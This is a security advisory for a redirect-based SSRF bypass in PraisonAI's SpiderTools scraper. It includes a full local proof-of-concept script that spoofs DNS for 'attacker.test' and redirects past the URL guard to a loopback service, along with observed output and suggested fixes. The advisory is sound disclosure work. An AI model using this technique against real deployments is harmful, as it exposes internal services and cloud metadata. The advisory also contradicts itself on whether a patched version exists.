MEDIUM 6.5

GHSA-6h9p-93hq-q7h6

PraisonAI: SpiderTools redirect-target SSRF protection bypass

# SpiderTools redirect-target SSRF protection bypass

## Summary

`SpiderTools.scrape_page()` validates the initial URL and rejects direct loopback, private, link-local, metadata, and internal hostnames. It then calls `requests.Session.get()` without disabling automatic redirects or validating redirect `Location` targets.

Requests follows redirects by default for GET requests. A safe-looking public URL can therefore pass `_validate_url()`, redirect to a blocked target such as `127.0.0.1` or `169.254.169.254`, and have the redirected response body parsed and returned by `scrape_page()`.

The same sink is used by `extract_links()`, `crawl()`, and `extract_text()` through their calls to `scrape_page()`.

## Affected component

```text
src/praisonai-agents/praisonaiagents/tools/spider_tools.py
```

Versions tested and confirmed affected:

- `v3.9.24` / `d08d98ca`
- `v3.9.26` / `62472a23`
- `v4.6.56` / `d3c4a2af`
- `v4.6.57` / `e90d92231853161ad931f3498da57651a9f8b528`
- current main `2f9677abb2ea68eab864ee8b6a828fd0141612e1`

No patched version is known at report time.

## Root cause

Current main validates only the caller-supplied URL:

```python
if not self._validate_url(url):
    return {"error": f"Invalid or potentially dangerous URL: {url}"}
```

The fetch then uses Requests defaults:

```python
response = session.get(
    url,
    timeout=timeout,
    verify=verify_ssl
)
```

Because `allow_redirects=False` is not set, Requests follows a 3xx redirect to a new destination that has not been checked by `_validate_url()` or `_host_is_blocked()`.
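The same default-follow behavior can be observed with the standard library. The sketch below is an assumption-laden stand-in: it uses `urllib.request` rather than Requests so it needs no third-party packages, and it runs two loopback servers. The default opener silently lands on a different URL from the one it was given. An opener with a hypothetical `NoRedirect` handler, which plays the role of `allow_redirects=False`, instead surfaces the 302 and its `Location` to the caller.

```python
import http.server
import threading
import urllib.error
import urllib.request


class TargetHandler(http.server.BaseHTTPRequestHandler):
    """Stands in for an internal service that a URL guard would block."""

    def do_GET(self):  # noqa: N802
        body = b"INTERNAL"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_args):
        pass  # keep the demo quiet


def make_redirector(location):
    """Build a handler class that answers every GET with 302 -> location."""

    class RedirectHandler(http.server.BaseHTTPRequestHandler):
        def do_GET(self):  # noqa: N802
            self.send_response(302)
            self.send_header("Location", location)
            self.send_header("Content-Length", "0")
            self.end_headers()

        def log_message(self, *_args):
            pass

    return RedirectHandler


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Hypothetical urllib analogue of Requests' allow_redirects=False."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        # Returning None declines the redirect, so urllib raises HTTPError
        # carrying the 3xx status and its Location header instead.
        return None


def serve(handler):
    server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def demo():
    target = serve(TargetHandler)
    target_url = f"http://127.0.0.1:{target.server_address[1]}/secret"
    redirector = serve(make_redirector(target_url))
    start_url = f"http://127.0.0.1:{redirector.server_address[1]}/go"
    no_proxy = urllib.request.ProxyHandler({})  # ignore *_proxy env vars
    try:
        # Default behavior: the 302 is followed without the caller seeing it.
        with urllib.request.build_opener(no_proxy).open(start_url, timeout=5) as resp:
            followed = (resp.url, resp.read())
        # No-redirect behavior: the caller receives the 302 and its target.
        try:
            urllib.request.build_opener(no_proxy, NoRedirect).open(start_url, timeout=5)
            declined = None
        except urllib.error.HTTPError as err:
            declined = (err.code, err.headers["Location"])
            err.close()
    finally:
        for server in (redirector, target):
            server.shutdown()
            server.server_close()
    return start_url, target_url, followed, declined


if __name__ == "__main__":
    print(demo())
```

A URL check that only looks at `start_url` never sees `target_url`, which is the gap described above.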

## Proof of vulnerability

The PoV below is local-only and does not contact external infrastructure. It starts a loopback-only internal service and a local redirector, then patches `socket.getaddrinfo`. When the lookup comes from PraisonAI's `_host_is_blocked()` check, `attacker.test` resolves to a public address (`93.184.216.34`). When the actual HTTP request is made, it resolves to the local redirector, which returns `302 Location: http://127.0.0.1:<port>/secret`.

Full PoV:

```python
#!/usr/bin/env python3
"""Local PoV for SpiderTools redirect-target SSRF.

This uses only loopback services. The "attacker" hostname is treated as
public during PraisonAI's initial URL validation, then routed to a local
redirector so the PoV does not contact external infrastructure. The
redirector points at a loopback-only internal service. Vulnerable behavior
is confirmed when SpiderTools follows that redirect and returns the internal
response body.
"""

from __future__ import annotations

import http.server
import importlib.util
import inspect
import os
import socket
import socketserver
import threading
from typing import Any


def _load_spider_tools_class():
    # Prefer an explicit spider_tools.py (e.g. a checkout of main) if given.
    module_file = os.environ.get("PRAISONAI_SPIDER_TOOLS_FILE")
    if module_file:
        spec = importlib.util.spec_from_file_location("pov_spider_tools", module_file)
        if spec is None or spec.loader is None:
            raise RuntimeError(f"Could not load spider_tools file: {module_file}")
        module = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(module)
        return module.SpiderTools

    from praisonaiagents.tools.spider_tools import SpiderTools

    return SpiderTools


class InternalHandler(http.server.BaseHTTPRequestHandler):
    """Loopback-only "internal" service that SpiderTools must not reach."""

    body = b"SPIDER-INTERNAL-SECRET"

    def do_GET(self) -> None:  # noqa: N802
        self.server.hit = True  # type: ignore[attr-defined]
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(self.body)))
        self.end_headers()
        self.wfile.write(self.body)

    def log_message(self, *_args: Any) -> None:
        return


class RedirectHandler(http.server.BaseHTTPRequestHandler):
    """Stands in for the attacker's server: 302 to the internal service."""

    target = ""

    def do_GET(self) -> None:  # noqa: N802
        self.server.hit = True  # type: ignore[attr-defined]
        self.send_response(302)
        self.send_header("Location", self.target)
        self.end_headers()

    def log_message(self, *_args: Any) -> None:
        return


def _called_from_spider_host_guard() -> bool:
    return any(frame.function == "_host_is_blocked" for frame in inspect.stack())


def main() -> int:
    os.environ.pop("ALLOW_LOCAL_CRAWL", None)

    internal = socketserver.TCPServer(("127.0.0.1", 0), InternalHandler)
    internal.hit = False  # type: ignore[attr-defined]
    internal_port = internal.server_address[1]

    RedirectHandler.target = f"http://127.0.0.1:{internal_port}/secret"
    redirect = socketserver.TCPServer(("127.0.0.1", 0), RedirectHandler)
    redirect.hit = False  # type: ignore[attr-defined]
    redirect_port = redirect.server_address[1]

    threading.Thread(target=internal.serve_forever, daemon=True).start()
    threading.Thread(target=redirect.serve_forever, daemon=True).start()

    original_getaddrinfo = socket.getaddrinfo

    def fake_getaddrinfo(host: str, port: int, *args: Any, **kwargs: Any):
        if host == "attacker.test":
            # Inside SpiderTools' host guard: look like a public address.
            if _called_from_spider_host_guard():
                return [
                    (
                        socket.AF_INET,
                        socket.SOCK_STREAM,
                        6,
                        "",
                        ("93.184.216.34", port),
                    )
                ]
            # Actual connection: route to the local redirector.
            return original_getaddrinfo("127.0.0.1", port, *args, **kwargs)
        return original_getaddrinfo(host, port, *args, **kwargs)

    tool = _load_spider_tools_class()()
    socket.getaddrinfo = fake_getaddrinfo
    try:
        # Control: a direct loopback URL must be rejected.
        direct_control = tool.scrape_page(
            f"http://127.0.0.1:{internal_port}/secret",
            timeout=5,
        )
        # Bypass: a public-looking URL that redirects to loopback.
        redirect_result = tool.scrape_page(
            f"http://attacker.test:{redirect_port}/go",
            timeout=5,
        )
        vulnerable_redirect_hit = bool(redirect.hit)  # type: ignore[attr-defined]
        vulnerable_internal_hit = bool(internal.hit)  # type: ignore[attr-defined]

        redirect.hit = False  # type: ignore[attr-defined]
        internal.hit = False  # type: ignore[attr-defined]

        import requests

        original_session_get = requests.Session.get

        # Fix control: force allow_redirects=False on every Session.get call.
        def no_redirect_get(self, url, **kwargs):  # type: ignore[no-untyped-def]
            kwargs.setdefault("allow_redirects", False)
            return original_session_get(self, url, **kwargs)

        requests.Session.get = no_redirect_get
        try:
            no_redirect_control = _load_spider_tools_class()().scrape_page(
                f"http://attacker.test:{redirect_port}/go",
                timeout=5,
            )
        finally:
            requests.Session.get = original_session_get
        no_redirect_redirect_hit = bool(redirect.hit)  # type: ignore[attr-defined]
        no_redirect_internal_hit = bool(internal.hit)  # type: ignore[attr-defined]
    finally:
        socket.getaddrinfo = original_getaddrinfo
        redirect.shutdown()
        internal.shutdown()
        redirect.server_close()
        internal.server_close()

    print("DIRECT_CONTROL:", direct_control)
    print("REDIRECT_RESULT:", redirect_result)
    print("REDIRECT_SERVER_HIT:", vulnerable_redirect_hit)
    print("INTERNAL_SERVER_HIT:", vulnerable_internal_hit)
    print("NO_REDIRECT_CONTROL:", no_redirect_control)
    print("NO_REDIRECT_SERVER_HIT:", no_redirect_redirect_hit)
    print("NO_REDIRECT_INTERNAL_HIT:", no_redirect_internal_hit)

    if not isinstance(direct_control, dict) or "dangerous URL" not in str(direct_control):
        raise SystemExit("control failed: direct loopback was not blocked")
    if not isinstance(redirect_result, dict) or "error" in redirect_result:
        raise SystemExit(f"bypass failed: unexpected result {redirect_result!r}")
    if "SPIDER-INTERNAL-SECRET" not in str(redirect_result.get("content", "")):
        raise SystemExit("bypass failed: internal body was not returned")
    if not vulnerable_redirect_hit or not vulnerable_internal_hit:
        raise SystemExit("bypass failed: expected local servers were not hit")
    if not no_redirect_redirect_hit or no_redirect_internal_hit:
        raise SystemExit("fix control failed: no-redirect mode reached internal service")

    print("PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```

Run:

```fish
cd /Users/rexliu/Documents/GA\ code/REDit\ Deployment/stack/deploy
env PRAISONAI_SPIDER_TOOLS_FILE=/path/to/PraisonAI/src/praisonai-agents/praisonaiagents/tools/spider_tools.py \
    uv run --with requests --with beautifulsoup4 --with lxml --python 3.11 \
    poc_spider_tools_redirect_ssrf.py
```

Observed on current main:

```text
DIRECT_CONTROL: {'error': 'Invalid or potentially dangerous URL: http://127.0.0.1:<port>/secret'}
REDIRECT_RESULT: {'url': 'http://attacker.test:<port>/go', 'status_code': 200, ... 'content': 'SPIDER-INTERNAL-SECRET', ...}
REDIRECT_SERVER_HIT: True
INTERNAL_SERVER_HIT: True
NO_REDIRECT_CONTROL: {'url': 'http://attacker.test:<port>/go', 'status_code': 302, ... 'Location': 'http://127.0.0.1:<port>/secret', ...}
NO_REDIRECT_SERVER_HIT: True
NO_REDIRECT_INTERNAL_HIT: False
PRAI-CAND-004 CONFIRMED: SpiderTools follows a redirect to loopback
```

The direct control proves direct loopback is blocked. The redirect result proves the same blocked destination is reached through a public-looking initial URL. The no-redirect control proves that disabling automatic redirects prevents the internal request while still receiving the external redirect response.

## Why this is not intended behavior

The Spider Tools documentation says `scrape_page`, `extract_links`, `crawl`, and `extract_text` refuse dangerous URLs before making any network request. The documented blocked classes include loopback, private/reserved IPs, link-local/cloud metadata endpoints, internal TLDs, non-HTTP(S) schemes, and parser-smuggling forms. The same page states that the validation is always on for the bundled spider tools and does not require `enable_security()`.

The current code also documents `_validate_url()` as URL validation "to prevent SSRF attacks." A redirect to a loopback target bypasses that documented protection.

## Impact

An attacker who can influence a URL passed to `scrape_page()`, `extract_links()`, `crawl()`, or `extract_text()` can cause the PraisonAI process to request destinations that SpiderTools is designed to block.

Potential impact includes:

- reading loopback-only HTTP services;
- probing or reading private network services reachable from the PraisonAI host;
- reading link-local/cloud metadata endpoints if reachable in the deployment environment.

The PoV demonstrates returned response-body disclosure from a loopback-only service. This report does not claim arbitrary code execution or live cloud credential theft without deployment-specific evidence.

## Severity

Suggested default severity: Moderate.

High severity may be appropriate for deployments where untrusted users can directly invoke SpiderTools through a network-facing agent, bot, API, or MCP service and sensitive internal or metadata services are reachable.

## Suggested fix

Disable automatic redirects in `scrape_page()`:

```python
response = session.get(
    url,
    timeout=timeout,
    verify=verify_ssl,
    allow_redirects=False,
)
```

If redirects should remain supported, follow them manually and validate every `Location` target before each hop using the same SSRF guard:

- require `http` or `https`;
- resolve and validate every redirect hostname;
- reject loopback, private, link-local, reserved, multicast, unspecified, internal, and metadata destinations;
- cap redirect count;
- apply the same safe fetch path to `scrape_page()`, `extract_links()`, `crawl()`, and `extract_text()`.
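A per-hop guard covering the scheme, name, and address checks in that list might look like the sketch below. It is a minimal illustration, not PraisonAI's `_validate_url()` or `_host_is_blocked()`: `url_is_safe`, `address_is_blocked`, and the internal-suffix list are hypothetical names chosen here. It only validates names. Because the HTTP client performs its own lookup afterwards, a resolver that answers differently the second time (the situation the PoV's patched `getaddrinfo` simulates) can still get through unless the connection is also pinned to the vetted address.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Hypothetical suffix deny-list for internal names; tune per deployment.
BLOCKED_NAME_SUFFIXES = (".localhost", ".local", ".internal")


def address_is_blocked(addr):
    """True for loopback, private, link-local, reserved, multicast, unspecified."""
    ip = ipaddress.ip_address(addr.split("%", 1)[0])  # strip any IPv6 zone id
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # judge ::ffff:127.0.0.1 as 127.0.0.1
    return (
        ip.is_loopback
        or ip.is_private
        or ip.is_link_local  # covers 169.254.169.254, the common metadata address
        or ip.is_reserved
        or ip.is_multicast
        or ip.is_unspecified
    )


def url_is_safe(url):
    """Hypothetical per-hop guard: scheme, then name, then every resolved address."""
    try:
        parts = urlsplit(url)
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False  # malformed URL or port: fail closed
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    host = parts.hostname.rstrip(".").lower()
    if host == "localhost" or host.endswith(BLOCKED_NAME_SUFFIXES):
        return False
    try:
        infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    except (OSError, UnicodeError):
        return False  # unresolvable or unencodable name: fail closed
    # Reject if *any* resolved address is internal, not just the first one.
    return bool(infos) and not any(address_is_blocked(info[4][0]) for info in infos)
```

Checking every address returned by `getaddrinfo` matters because a name with one public and one private record would otherwise pass whenever the public record happened to come first.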

Regression tests should cover direct loopback rejection, public-to-loopback redirect rejection, public-to-public redirects if supported, and all `scrape_page()` callers.
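The manual-redirect option, checked against the regression cases just listed, can be sketched with an injected transport so it runs without a network. `fetch_following_safe_redirects`, `fetch_once`, `literal_ip_is_public`, and the route table are hypothetical. In a Requests-based implementation, `fetch_once` would be something like `session.get(url, timeout=timeout, verify=verify_ssl, allow_redirects=False)` and `is_allowed` the same guard used for the initial URL. The toy validator here accepts only public IP literals.

```python
import ipaddress
from typing import Callable, Mapping, NamedTuple
from urllib.parse import urljoin, urlsplit


class Response(NamedTuple):
    status: int
    headers: Mapping[str, str]  # a real client would use case-insensitive headers
    body: bytes


class BlockedRedirect(Exception):
    """Raised when a hop fails validation or the redirect cap is exceeded."""


REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def fetch_following_safe_redirects(
    url: str,
    fetch_once: Callable[[str], Response],
    is_allowed: Callable[[str], bool],
    max_redirects: int = 5,
) -> tuple[str, Response]:
    for _ in range(max_redirects + 1):
        # Validate *before* every request, including each redirect target.
        if not is_allowed(url):
            raise BlockedRedirect(f"refusing to fetch {url}")
        resp = fetch_once(url)  # must not follow redirects on its own
        location = resp.headers.get("Location")
        if resp.status not in REDIRECT_STATUSES or not location:
            return url, resp
        url = urljoin(url, location)  # resolve relative Location headers
    raise BlockedRedirect(f"more than {max_redirects} redirects")


def literal_ip_is_public(url: str) -> bool:
    """Toy guard for this demo: http(s) URLs whose host is a global IP literal."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        return ipaddress.ip_address(parts.hostname).is_global
    except ValueError:
        return False  # hostnames would need resolution; out of scope here


ROUTES = {
    "http://93.184.216.34/go": Response(302, {"Location": "http://127.0.0.1:8080/secret"}, b""),
    "http://93.184.216.34/moved": Response(301, {"Location": "/final"}, b""),
    "http://93.184.216.34/final": Response(200, {}, b"public page"),
    "http://93.184.216.34/loop": Response(302, {"Location": "/loop"}, b""),
    "http://127.0.0.1:8080/secret": Response(200, {}, b"SPIDER-INTERNAL-SECRET"),
}
fetched: list[str] = []


def fake_fetch_once(url: str) -> Response:
    fetched.append(url)  # record every URL that actually reached the transport
    return ROUTES[url]


def outcome(start_url: str):
    try:
        final_url, resp = fetch_following_safe_redirects(
            start_url, fake_fetch_once, literal_ip_is_public
        )
        return ("ok", final_url, resp.body)
    except BlockedRedirect as exc:
        return ("blocked", str(exc))
```

Because validation runs before each request, a blocked redirect target is rejected without any connection being made to it; the `fetched` list lets a test assert exactly that.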


## Affected packages

- PyPI / `praisonaiagents`
- Introduced in: 0
- Fixed in: 1.6.59

Fix: `pip install --upgrade 'praisonaiagents>=1.6.59'`
